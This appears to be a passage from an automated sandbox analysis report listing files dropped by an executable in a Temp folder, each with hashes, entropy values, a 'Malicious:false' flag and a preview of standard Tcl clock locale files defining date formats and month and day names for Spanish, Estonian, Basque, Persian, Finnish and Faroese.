                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.873281593259653
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmo76GUFLoTW3v6rZo76T+3v9f6HK:4EnLzu8d6GUF73v6rq6K3vMq
                                                                                                                                                                                                                                                    MD5:F08EF3582AF2F88B71C599FBEA38BFD9
                                                                                                                                                                                                                                                    SHA1:456C90C09C2A8919DC948E86170F523062F135DB
                                                                                                                                                                                                                                                    SHA-256:7AC5FC35BC422A5445603E0430236E62CCA3558787811DE22305F72D439EB4BB
                                                                                                                                                                                                                                                    SHA-512:7187FC4CE0533F14BBA073039A0B86D610618573BA9A936CBE7682ED2939384C6BB9E0A407C016A42702E83627CCE394618ACB58419EA36908AA37F59165E371
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset es_CR DATE_FORMAT "%d/%m/%Y". ::msgcat::mcset es_CR TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset es_CR DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.8668686830029335
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmomerQZnFLou3v6rZom7+3vrQZg6HK:4EnLzu8xkZFH3v6rM3vkrq
                                                                                                                                                                                                                                                    MD5:44F2EE567A3E9A021A3C16062CEAE220
                                                                                                                                                                                                                                                    SHA1:180E938584F0A57AC0C3F85E6574BC48291D820E
                                                                                                                                                                                                                                                    SHA-256:847C14C297DBE4D8517DEBAA8ED555F3DAEDF843D6BAD1F411598631A0BD3507
                                                                                                                                                                                                                                                    SHA-512:BEB005D006E432963F9C1EF474A1E3669C8B7AF0681681E74DDA8FE9C8EE04D307EF85CF0257DA72663026138D38807A6ABA1255337CF8CC724ED1993039B40C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset es_DO DATE_FORMAT "%m/%d/%Y". ::msgcat::mcset es_DO TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset es_DO DATE_TIME_FORMAT "%m/%d/%Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.86970949384834
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmozgUFLoro+3v6rZoz9+3v9f6HK:4EnLzu8ZgUFcF3v6ruI3vMq
                                                                                                                                                                                                                                                    MD5:CCB036C33BA7C8E488D37E754075C6CF
                                                                                                                                                                                                                                                    SHA1:336548C8D361B1CAA8BDF698E148A88E47FB27A6
                                                                                                                                                                                                                                                    SHA-256:2086EE8D7398D5E60E5C3048843B388437BD6F2507D2293CA218936E3BF61E59
                                                                                                                                                                                                                                                    SHA-512:05058262E222653CF3A4C105319B74E07322AEE726CC11AEB2B562F01FF2476E3169EA829BF8B66E1B76617CB58E45423480E5A6CB3B3D4B33AA4DDDFA52D111
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset es_EC DATE_FORMAT "%d/%m/%Y". ::msgcat::mcset es_EC TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset es_EC DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.86395314548955
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmohvjbJFLoI3v6rZoho+3vjb0f6HK:4EnLzu8PJFB3v6r23vbq
                                                                                                                                                                                                                                                    MD5:1E6062716A094CC3CE1F2C97853CD3CD
                                                                                                                                                                                                                                                    SHA1:499F69E661B3B5747227B31DE4539CAF355CCAAC
                                                                                                                                                                                                                                                    SHA-256:1BC22AF98267D635E3F07615A264A716940A2B1FAA5CAA3AFF54D4C5A4A34370
                                                                                                                                                                                                                                                    SHA-512:7C3FB65EC76A2F35354E93A47C3A59848170AAF504998CEF66AEBAAD39D303EC67BE212C6FACC98305E35FFEBF23CCB7E34396F11987E81D76B3685E6B5E89B3
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset es_GT DATE_FORMAT "%e/%m/%Y". ::msgcat::mcset es_GT TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset es_GT DATE_TIME_FORMAT "%e/%m/%Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.902544453689719
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmoIvriP/FLoP3v6rZoIo+3vrig6HK:4EnLzu8w+nF+3v6rP3v+lq
                                                                                                                                                                                                                                                    MD5:AAE4A89F6AB01044D6BA3511CBE6FE66
                                                                                                                                                                                                                                                    SHA1:639A94279453B0028995448FD2E221C1BDE23CEE
                                                                                                                                                                                                                                                    SHA-256:A2D25880C64309552AACED082DEED1EE006482A14CAB97DB524E9983EE84ACFC
                                                                                                                                                                                                                                                    SHA-512:E2BE94973C931B04C730129E9B9746BB76E7AC7F5AAA8D7899903B8C86B4E3D4A955E9580CF2C64DE48AFD6A2A9386337C2F8A8128A511AFBFBBA09CC032A76E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset es_HN DATE_FORMAT "%m-%d-%Y". ::msgcat::mcset es_HN TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset es_HN DATE_TIME_FORMAT "%m-%d-%Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.863953145489551
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset es_MX DATE_FORMAT "%e/%m/%Y". ::msgcat::mcset es_MX TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset es_MX DATE_TIME_FORMAT "%e/%m/%Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.872124246425178
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset es_NI DATE_FORMAT "%m-%d-%Y". ::msgcat::mcset es_NI TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset es_NI DATE_TIME_FORMAT "%m-%d-%Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.860352858208512
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset es_PA DATE_FORMAT "%m/%d/%Y". ::msgcat::mcset es_PA TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset es_PA DATE_TIME_FORMAT "%m/%d/%Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.8632965835916195
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset es_PE DATE_FORMAT "%d/%m/%Y". ::msgcat::mcset es_PE TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset es_PE DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.859298425911738
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset es_PR DATE_FORMAT "%m-%d-%Y". ::msgcat::mcset es_PR TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset es_PR DATE_TIME_FORMAT "%m-%d-%Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.871431420165191
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset es_PY DATE_FORMAT "%d/%m/%Y". ::msgcat::mcset es_PY TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset es_PY DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.883202808381857
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset es_SV DATE_FORMAT "%m-%d-%Y". ::msgcat::mcset es_SV TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset es_SV DATE_TIME_FORMAT "%m-%d-%Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.877844330421912
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset es_UY DATE_FORMAT "%d/%m/%Y". ::msgcat::mcset es_UY TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset es_UY DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.882638228899482
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset es_VE DATE_FORMAT "%d/%m/%Y". ::msgcat::mcset es_VE TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset es_VE DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1206
                                                                                                                                                                                                                                                    Entropy (8bit):4.321464868793769
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset et DAYS_OF_WEEK_ABBREV [list \. "P"\. "E"\. "T"\. "K"\. "N"\. "R"\. "L"]. ::msgcat::mcset et DAYS_OF_WEEK_FULL [list \. "p\u00fchap\u00e4ev"\. "esmasp\u00e4ev"\. "teisip\u00e4ev"\. "kolmap\u00e4ev"\. "neljap\u00e4ev"\. "reede"\. "laup\u00e4ev"]. ::msgcat::mcset et MONTHS_ABBREV [list \. "Jaan"\. "Veebr"\. "M\u00e4rts"\. "Apr"\. "Mai"\. "Juuni"\. "Juuli"\. "Aug"\. "Sept"\. "Okt"\. "Nov"\. "Dets"\. ""]. ::msgcat::mcset et MONTHS_FULL [list \. "Jaanuar"\. "Veebruar"\. "M\u00e4rts"\. "Aprill"\. "Mai"\. "Juuni"\. "Juuli"\. "August"\. "September"\. "Oktoober"\. "November"\. "Detsember"\. ""]. ::msgcat::mcset et
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):985
                                                                                                                                                                                                                                                    Entropy (8bit):3.9137059580146376
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset eu DAYS_OF_WEEK_ABBREV [list \. "igandea"\. "astelehena"\. "asteartea"\. "asteazkena"\. "osteguna"\. "ostirala"\. "larunbata"]. ::msgcat::mcset eu DAYS_OF_WEEK_FULL [list \. "igandea"\. "astelehena"\. "asteartea"\. "asteazkena"\. "osteguna"\. "ostirala"\. "larunbata"]. ::msgcat::mcset eu MONTHS_ABBREV [list \. "urt"\. "ots"\. "mar"\. "api"\. "mai"\. "eka"\. "uzt"\. "abu"\. "ira"\. "urr"\. "aza"\. "abe"\. ""]. ::msgcat::mcset eu MONTHS_FULL [list \. "urtarrila"\. "otsaila"\. "martxoa"\. "apirila"\. "maiatza"\. "ekaina"\. "uztaila"\. "abuztua"\. "iraila"\. "urria"\. "azaroa"\. "abendua"\. ""].}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):287
                                                                                                                                                                                                                                                    Entropy (8bit):4.8689948586471825
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset eu_ES DATE_FORMAT "%a, %Yeko %bren %da". ::msgcat::mcset eu_ES TIME_FORMAT "%T". ::msgcat::mcset eu_ES TIME_FORMAT_12 "%T". ::msgcat::mcset eu_ES DATE_TIME_FORMAT "%y-%m-%d %T %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1664
                                                                                                                                                                                                                                                    Entropy (8bit):4.1508548760580295
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset fa DAYS_OF_WEEK_ABBREV [list \. "\u06cc\u2214"\. "\u062f\u2214"\. "\u0633\u2214"\. "\u0686\u2214"\. "\u067e\u2214"\. "\u062c\u2214"\. "\u0634\u2214"]. ::msgcat::mcset fa DAYS_OF_WEEK_FULL [list \. "\u06cc\u06cc\u200c\u0634\u0646\u0628\u0647"\. "\u062f\u0648\u0634\u0646\u0628\u0647"\. "\u0633\u0647\u200c\u0634\u0646\u0628\u0647"\. "\u0686\u0647\u0627\u0631\u0634\u0646\u0628\u0647"\. "\u067e\u0646\u062c\u200c\u0634\u0646\u0628\u0647"\. "\u062c\u0645\u0639\u0647"\. "\u0634\u0646\u0628\u0647"]. ::msgcat::mcset fa MONTHS_ABBREV [list \. "\u0698\u0627\u0646"\. "\u0641\u0648\u0631"\. "\u0645\u0627\u0631"\. "\u0622\u0648\u0631"\. "\u0645\u0640\u0647"\. "\u0698\u0648\u0646"\. "\u0698\u0648\u06cc"\. "\u0627\u0648\u062a"\. "\u0633\u067e\u
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1957
                                                                                                                                                                                                                                                    Entropy (8bit):4.433104256056609
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset fa_IN DAYS_OF_WEEK_ABBREV [list \. "\u06cc\u2214"\. "\u062f\u2214"\. "\u0633\u2214"\. "\u0686\u2214"\. "\u067e\u2214"\. "\u062c\u2214"\. "\u0634\u2214"]. ::msgcat::mcset fa_IN DAYS_OF_WEEK_FULL [list \. "\u06cc\u06cc\u200c\u0634\u0646\u0628\u0647"\. "\u062f\u0648\u0634\u0646\u0628\u0647"\. "\u0633\u0647\u200c\u0634\u0646\u0628\u0647"\. "\u0686\u0647\u0627\u0631\u0634\u0646\u0628\u0647"\. "\u067e\u0646\u062c\u200c\u0634\u0646\u0628\u0647"\. "\u062c\u0645\u0639\u0647"\. "\u0634\u0646\u0628\u0647"]. ::msgcat::mcset fa_IN MONTHS_ABBREV [list \. "\u0698\u0627\u0646"\. "\u0641\u0648\u0631"\. "\u0645\u0627\u0631"\. "\u0622\u0648\u0631"\. "\u0645\u0640\u0647"\. "\u0698\u0648\u0646"\. "\u0698\u0648\u06cc"\. "\u0627\u0648\u062a"\. "\u063
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):417
                                                                                                                                                                                                                                                    Entropy (8bit):5.087144086729547
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset fa_IR AM "\u0635\u0628\u062d". ::msgcat::mcset fa_IR PM "\u0639\u0635\u0631". ::msgcat::mcset fa_IR DATE_FORMAT "%d\u2044%m\u2044%Y". ::msgcat::mcset fa_IR TIME_FORMAT "%S:%M:%H". ::msgcat::mcset fa_IR TIME_FORMAT_12 "%S:%M:%l %P". ::msgcat::mcset fa_IR DATE_TIME_FORMAT "%d\u2044%m\u2044%Y %S:%M:%H %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1145
                                                                                                                                                                                                                                                    Entropy (8bit):4.249302428029841
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8ZeTWSS/DatuUSlWCBTtotL8W183eYKvt3v3eG:46sWp/DatBSPtoNmpMt/J
                                                                                                                                                                                                                                                    MD5:34FE8E2D987FE534BD88291046F6820B
                                                                                                                                                                                                                                                    SHA1:B173700C176336BD1B123C2A055A685F73B60C07
                                                                                                                                                                                                                                                    SHA-256:BE0D2DCE08E6CD786BC3B07A1FB1ADC5B2CF12053C99EACDDAACDDB8802DFB9C
                                                                                                                                                                                                                                                    SHA-512:4AC513F092D2405FEF6E30C828AE94EDBB4B0B0E1C68C1168EB2498C186DB054EBF697D6B55B49F865A2284F75B7D5490AFE7A80F887AE8312E6F9A5EFE16390
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset fi DAYS_OF_WEEK_ABBREV [list \. "su"\. "ma"\. "ti"\. "ke"\. "to"\. "pe"\. "la"]. ::msgcat::mcset fi DAYS_OF_WEEK_FULL [list \. "sunnuntai"\. "maanantai"\. "tiistai"\. "keskiviikko"\. "torstai"\. "perjantai"\. "lauantai"]. ::msgcat::mcset fi MONTHS_ABBREV [list \. "tammi"\. "helmi"\. "maalis"\. "huhti"\. "touko"\. "kes\u00e4"\. "hein\u00e4"\. "elo"\. "syys"\. "loka"\. "marras"\. "joulu"\. ""]. ::msgcat::mcset fi MONTHS_FULL [list \. "tammikuu"\. "helmikuu"\. "maaliskuu"\. "huhtikuu"\. "toukokuu"\. "kes\u00e4kuu"\. "hein\u00e4kuu"\. "elokuu"\. "syyskuu"\. "lokakuu"\. "marraskuu"\. "joulukuu"\. ""]. ::msgcat
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):986
                                                                                                                                                                                                                                                    Entropy (8bit):4.07740021579371
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:4EnLzu87mY5mvAqO6RxmtV5qHbMj6aywE1ZD4ScMfRDc6VZTEpSecbLwJQT1Y4:4azu874/RqEXsSpffTBtbQQT1t
                                                                                                                                                                                                                                                    MD5:996B699F6821A055B826415446A11C8E
                                                                                                                                                                                                                                                    SHA1:C382039ED7D2AE8D96CF2EA55FA328AE9CFD2F7D
                                                                                                                                                                                                                                                    SHA-256:F249DD1698ED1687E13654C04D08B829193027A2FECC24222EC854B59350466A
                                                                                                                                                                                                                                                    SHA-512:AB6F5ABC9823C7F7A67BA1E821680ACD37761F83CD1F46EC731AB2B72AA34C2E523ACE288E9DE70DB3D58E11F5CB42ECB5A5E4E39BFD7DFD284F1FF6B637E11D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset fo DAYS_OF_WEEK_ABBREV [list \. "sun"\. "m\u00e1n"\. "t\u00fds"\. "mik"\. "h\u00f3s"\. "fr\u00ed"\. "ley"]. ::msgcat::mcset fo DAYS_OF_WEEK_FULL [list \. "sunnudagur"\. "m\u00e1nadagur"\. "t\u00fdsdagur"\. "mikudagur"\. "h\u00f3sdagur"\. "fr\u00edggjadagur"\. "leygardagur"]. ::msgcat::mcset fo MONTHS_ABBREV [list \. "jan"\. "feb"\. "mar"\. "apr"\. "mai"\. "jun"\. "jul"\. "aug"\. "sep"\. "okt"\. "nov"\. "des"\. ""]. ::msgcat::mcset fo MONTHS_FULL [list \. "januar"\. "februar"\. "mars"\. "apr\u00edl"\. "mai"\. "juni"\. "juli"\. "august"\. "september"\. "oktober"\. "november"\. "desember"\. ""].}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):279
                                                                                                                                                                                                                                                    Entropy (8bit):4.816022066048386
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmoZA4HFLoZd3vG5oZd3v6X5oZd+3vnFDoAov:4EnLzu8kyFO3vf3v6f3v9dy
                                                                                                                                                                                                                                                    MD5:A76D09A4FA15A2C985CA6BDD22989D6A
                                                                                                                                                                                                                                                    SHA1:E6105EBCDC547FE2E2FE9EDDC9C573BBDAD85AD0
                                                                                                                                                                                                                                                    SHA-256:7145B57AC5C074BCA968580B337C04A71BBD6EFB93AFAF291C1361FD700DC791
                                                                                                                                                                                                                                                    SHA-512:D16542A1CCDC3F5C2A20300B7E38F43F94F7753E0E99F08EB7240D4F286B263815AD481B29F4E96F268E24BA17C5E135E356448685E1BF65B2B63CE6146AA54C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset fo_FO DATE_FORMAT "%d/%m-%Y". ::msgcat::mcset fo_FO TIME_FORMAT "%T". ::msgcat::mcset fo_FO TIME_FORMAT_12 "%T". ::msgcat::mcset fo_FO DATE_TIME_FORMAT "%a %d %b %Y %T %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1205
                                                                                                                                                                                                                                                    Entropy (8bit):4.313638548211754
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8qW09HSZ2p60wTyVz5bGzJzzTK+VUuG4CNnvxvB:46JYY5moleiUb42vlB
                                                                                                                                                                                                                                                    MD5:B475F8E7D7065A67E73B1E5CDBF9EB1F
                                                                                                                                                                                                                                                    SHA1:1B689EDC29F8BC4517936E5D77A084083F12AE31
                                                                                                                                                                                                                                                    SHA-256:7A87E418B6D8D14D8C11D63708B38D607D28F7DDBF39606C7D8FBA22BE7892CA
